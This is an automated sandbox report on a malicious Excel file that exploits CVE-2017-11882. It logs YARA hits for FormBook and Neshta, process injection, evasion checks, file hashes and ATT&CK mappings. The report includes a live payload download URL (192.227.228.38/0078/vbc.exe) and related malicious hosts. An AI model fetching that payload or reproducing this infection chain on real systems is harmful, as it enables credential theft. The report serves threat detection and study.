    Source: 00000005.00000002.488911564.00000000030B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000006.00000000.484429588.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000006.00000000.486527655.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000006.00000000.478490697.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: 00000006.00000000.474755506.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_004047D3
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_004061D4
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_73233070
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_732330BA
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_73235AEE
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_73235AFD
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_004047D3
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_004061D4
    Source: C:\Users\Public\vbc.exe | Code function: String function: 00402A29 appears 51 times
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_73235ECC CreateProcessW,NtQueryInformationProcess,VirtualAllocEx,CreateRemoteThread,SuspendThread,
    Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
    Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
    Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
    Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
    Source: Packing List.xlsx | Virustotal: Detection: 32%
    Source: Packing List.xlsx | ReversingLabs: Detection: 29%
    Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Packing List.xlsx
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVREDD7.tmp
    Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@6/20@0/1
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402053 CoCreateInstance,MultiByteToWideChar,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
    Source: Packing List.xlsx | Joe Sandbox Cloud Basic: Detection: clean Score: 0
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: wntdll.pdb source: vbc.exe, 00000005.00000003.474355640.000000000F300000.00000004.00000001.sdmp
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
    Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\nsn3BBA.tmp\oxtrp.dll
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

    Boot Survival:

    Drops PE files to the user root directory
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2696 | Thread sleep time: -420000s >= -30000s
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_00405E93 FindFirstFileA,FindClose,
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_00402671 FindFirstFileA,
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00402671 FindFirstFileA,
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_00405E93 FindFirstFileA,FindClose,
    Source: C:\Users\Public\vbc.exe | Code function: 6_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
    Source: vbc.exe, 00000005.00000002.488053406.00000000004E4000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_73233070 lqcuopia,GetProcessHeap,RtlAllocateHeap,memset,VirtualProtect,
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_732354DA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_7323581C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_7323579F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_732356EE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_732357DE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\Public\vbc.exe | Process queried: DebugPort

    HIPS / PFW / Operating System Protection Evasion:

    Injects a PE file into a foreign processes
    Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 1C0000 value starts with: 4D5A
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: vbc.exe, 00000006.00000002.682205793.00000000009C0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000006.00000002.682205793.00000000009C0000.00000002.00020000.sdmp | Binary or memory string: !Progman
    Source: vbc.exe, 00000006.00000002.682205793.00000000009C0000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
    Source: C:\Users\Public\vbc.exe | Code function: 5_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

    Stealing of Sensitive Information:

    Yara detected FormBook
    Source: Yara match | File source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY

    Remote Access Functionality:

    Yara detected FormBook
    Source: Yara match | File source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Exploitation for Client Execution 12 | Path Interception | Process Injection 112 | Masquerading 111 | OS Credential Dumping | Security Software Discovery 21 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Extra Window Memory Injection 1 | Virtualization/Sandbox Evasion 2 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 112 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 21 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 1 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 1 | Cached Domain Credentials | System Information Discovery 4 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Extra Window Memory Injection 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

    Behavior Graph

    Screenshots

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    Packing List.xlsx | 32% | Virustotal |
    Packing List.xlsx | 30% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

    Dropped Files

    Source | Detection | Scanner | Label
    C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML |

    Unpacked PE Files

    Source | Detection | Scanner | Label
    6.2.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1130366
    5.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.400000.18.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.400000.8.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.400000.16.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.1c0000.13.unpack | 100% | Avira | W32/Delf.I
    6.0.vbc.exe.1c0000.15.unpack | 100% | Avira | W32/Delf.I
    6.0.vbc.exe.1c0000.7.unpack | 100% | Avira | W32/Delf.I
    6.0.vbc.exe.1c0000.9.unpack | 100% | Avira | W32/Delf.I
    6.0.vbc.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.1c0000.21.unpack | 100% | Avira | W32/Delf.I
    6.0.vbc.exe.400000.24.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.400000.20.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.2.vbc.exe.1c0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
    5.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.1c0000.5.unpack | 100% | Avira | W32/Delf.I
    6.0.vbc.exe.1c0000.23.unpack | 100% | Avira | W32/Delf.I
    6.0.vbc.exe.1c0000.17.unpack | 100% | Avira | W32/Delf.I
    6.0.vbc.exe.1c0000.11.unpack | 100% | Avira | W32/Delf.I
    6.0.vbc.exe.1c0000.25.unpack | 100% | Avira | W32/Delf.I
    6.0.vbc.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.400000.10.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.400000.6.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.1c0000.19.unpack | 100% | Avira | W32/Delf.I
    6.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.400000.26.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.400000.22.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.400000.12.unpack | 100% | Avira | HEUR/AGEN.1130366
    6.0.vbc.exe.400000.14.unpack | 100% | Avira | HEUR/AGEN.1130366
    5.2.vbc.exe.30b0000.5.unpack | 100% | Avira | W32/Delf.I

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label
    http://www.%s.comPA | 0% | URL Reputation | safe
    http://192.227.228.38/0078/vbc.exe | 0% | Avira URL Cloud | safe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://192.227.228.38/0078/vbc.exe | true | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://www.%s.comPA | vbc.exe, 00000005.00000002.488324538.00000000021E0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | vbc.exe, 00000005.00000002.488324538.00000000021E0000.00000002.00020000.sdmp | false | | high
    http://nsis.sf.net/NSIS_Error | vbc.exe, vbc.exe, 00000006.00000000.474777707.0000000000409000.00000008.00020000.sdmp, vbc.exe.3.dr | false | | high
    http://nsis.sf.net/NSIS_ErrorError | vbc.exe, 00000005.00000000.468788902.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000006.00000000.474777707.0000000000409000.00000008.00020000.sdmp, vbc.exe.3.dr | false | | high

          Contacted IPs

          Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          192.227.228.38 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true

          General Information

          Joe Sandbox Version: 33.0.0 White Diamond
          Analysis ID: 510251
          Start date: 27.10.2021
          Start time: 16:32:11
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 6m 54s
          Hypervisor based Inspection enabled: false
          Report type: light
          Sample file name: Packing List.xlsx
          Cookbook file name: defaultwindowsofficecookbook.jbs
          Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of analysed new started processes analysed: 9
          Number of new started drivers analysed: 1
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Detection: MAL
          Classification: mal100.troj.expl.evad.winXLSX@6/20@0/1
          EGA Information: Failed
          HDC Information:
          • Successful, ratio: 81.7% (good quality ratio 77.5%)
          • Quality average: 81.3%
          • Quality standard deviation: 28.5%
          HCA Information: Failed
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .xlsx
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Scroll down
          • Close Viewer
          Warnings:
          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, vga.dll, WMIADAP.exe, svchost.exe
          • TCP Packets have been reduced to 100

          Simulations

          Behavior and APIs

          Time | Type | Description
          16:32:45 | API Interceptor | 68x Sleep call for process: EQNEDT32.EXE modified

          Joe Sandbox View / Context

          IPs

          Match | Associated Sample Name / URL | Detection | Context
          192.227.228.38 | Copy of Packing list.xlsx | malicious | 192.227.228.38/0002/vbc.exe
          192.227.228.38 | ZbSq7CdOUj.rtf | malicious | 192.227.228.38/0080008/vbc.exe
          192.227.228.38 | Hans Company Profile Introduction.docx | malicious | 192.227.228.38/0080008/vbc.exe
          192.227.228.38 | statement of account.xlsx | malicious | 192.227.228.38/007007/vbc.exe

          Domains

          No context

          ASN

          Match | Associated Sample Name / URL | Detection | Context
          AS-COLOCROSSINGUS | Wire_Slip.xlsx | malicious | 198.23.207.126
          AS-COLOCROSSINGUS | Product List.xlsx | malicious | 198.12.84.79
          AS-COLOCROSSINGUS | Wire Slip.xlsx | malicious | 198.23.207.126
          AS-COLOCROSSINGUS | REIGHT USD INV1191189.xlsx | malicious | 107.172.13.131
          AS-COLOCROSSINGUS | 0091.xlsx | malicious | 198.23.207.126
          AS-COLOCROSSINGUS | 2TkB2NqXCr | malicious | 23.94.7.197
          AS-COLOCROSSINGUS | zzTPBS20ET | malicious | 23.94.7.197
          AS-COLOCROSSINGUS | 89pORI97Y0 | malicious | 23.94.7.197
          AS-COLOCROSSINGUS | ute6vN10U5 | malicious | 23.94.7.197
          AS-COLOCROSSINGUS | MV0uBqNa6f | malicious | 23.94.7.197
          AS-COLOCROSSINGUS | pNKZQ55tRW | malicious | 23.94.7.197
          AS-COLOCROSSINGUS | QAxi5UqBjK | malicious | 23.94.7.197
          AS-COLOCROSSINGUS | buM12G4dfw | malicious | 23.94.7.197
          AS-COLOCROSSINGUS | ff9gc08m8k | malicious | 23.94.7.197
          AS-COLOCROSSINGUS | Requested Items.xlsx | malicious | 192.227.158.118
          AS-COLOCROSSINGUS | Euro_payment.xlsx | malicious | 23.94.159.219
          AS-COLOCROSSINGUS | SHIPPING DOCUMENT.xlsx | malicious | 198.46.199.161
          AS-COLOCROSSINGUS | Unpaid invoice 76810091.xlsx | malicious | 107.172.13.131
          AS-COLOCROSSINGUS | DHL Receipt_AWB811470484778.xlsx | malicious | 198.12.84.79
          AS-COLOCROSSINGUS | Remittance_Advice_USD35,949.xlsx | malicious | 104.168.32.50

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Category: downloaded
          Size (bytes): 235529
          Entropy (8bit): 7.915461873573666
          Encrypted: false
          SSDEEP: 6144:wBlL/c2HMSZ54elOp0S4jfEpGibIsdpwBQ:Ce2HMSZWeO0S4Mh0gS6
          MD5: DF330AB2A2E5AA4AC947315EE3F93992
          SHA1: 76B5D1EEE342B47FE58E2136A067712CBD210351
          SHA-256: 99A897C5B8F53E1D04E51107C748A4F385B754A852CA6B605559F5B50820A64F
          SHA-512: E65F573D68E8F198024028D553210095173D1551E6074B60D9543977116A0286F75641F4692049A49E6CD03729B001027136419D6CF0C71645E800D5522ED895
          Malicious: true
          Antivirus:
          • Antivirus: Joe Sandbox ML, Detection: 100%
          Reputation: low
          IE Cache URL: http://192.227.228.38/0078/vbc.exe
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\251FF695.png
          Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type: PNG image data, 550 x 360, 8-bit colormap, non-interlaced
          Category: dropped
          Size (bytes): 15625
          Entropy (8bit): 7.975433466796902
          Encrypted: false
          SSDEEP: 384:3quMy4uOwJYk5DcUWbdfFZBa7Q9bvC78yPelujgXolFo:6Zk5DcU+FXhavB/lFo
          MD5: 79996F390643F9E11F14334A3740FA5E
          SHA1: 3A99EC9B5E2057264FFE629D3ABA182912EDB80E
          SHA-256: 406EE07DA7DEB2B38B87074EA55980BFE3FEFBD57E50AE7D25502D67A711B15C
          SHA-512: BDD3DB6E24418C0F8B74D79F3B0DDFFAF96A5CD2ABE0D45AEEC5E53EA17B0AD17B239C26781FD5BE34CAC3582F24773BF3FEF0616F6BE024117C1A2DB9A3F0B2
          Malicious: false
          Reputation: moderate, very likely benign file
          Preview: .PNG........IHDR...&...h.....T......bPLTE..."...P........{......P]............Fx....]..i..bb...,...........K.....................}..........=.....3.....srs...k.....QPR.~.........es.??@...keb"u.]\]x..1h......td..{.....**,...A..odz.....*Q..qAXf............>............u...hXr.y......MTx......R..l..........................K8V%[......=.9nwQT..9.........._=..>.y.^LA.(...R.....;bIDATx..X.o.@.....G..E...6,F.M..T...UZ,!Y!...fIH(........h.?.k..x...%....P...D!...L..2).....G..c.d.+......&:.+........OQ..._..T......%>......e%4.fR......t.3..w..$Xp.6........L..=.vu.X..6......*.W.G.4..Y.c.*...2c....|i....#...~_.Z.66}....l.\...... .L|..zk.G.."..)8. .&&....SN(.7...W...m_ J...<<..$..k.B.F...Q....hs.2!I.s..T...7e4D....E...c.bDl!...C.....t#...*p7.U.#t...32......uy;.....j'.j.#.G.C.. Z...(V.j.#|..b...o.....R=....t.0Wf.r..?..c..R..9.........i.j.y[...A.c.F.uO.M.j...&.q..9T..k.-.+.<.zZ.<...6..rT..W..]..St._....h5^..2.3F.....r~+.8z.......+..[<..._.8...8v....`.o
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27DB9FE4.emf
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):1099960
          Entropy (8bit):2.015321809949325
          Encrypted:false
          SSDEEP:3072:kXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:CahIFdyiaT2qtXl
          MD5:C68C54CBF6E515EC83B659DC674D2013
          SHA1:AF1569EFB4539B1DB71B3D023869D4DB7AA133A8
          SHA-256:986959C09FA256369BA2D9DEF03B2A661E745E470FE8E196EE79A7083CE80869
          SHA-512:B195F95DAB6C4C4B469803FA66257BB8600F1F9F53C3139F3E5858763629CFF5E13DB51B5690CAC473EBA153D482C43228AA668157F7392B65E594AFE999E6C0
          Malicious:false
          Reputation:low
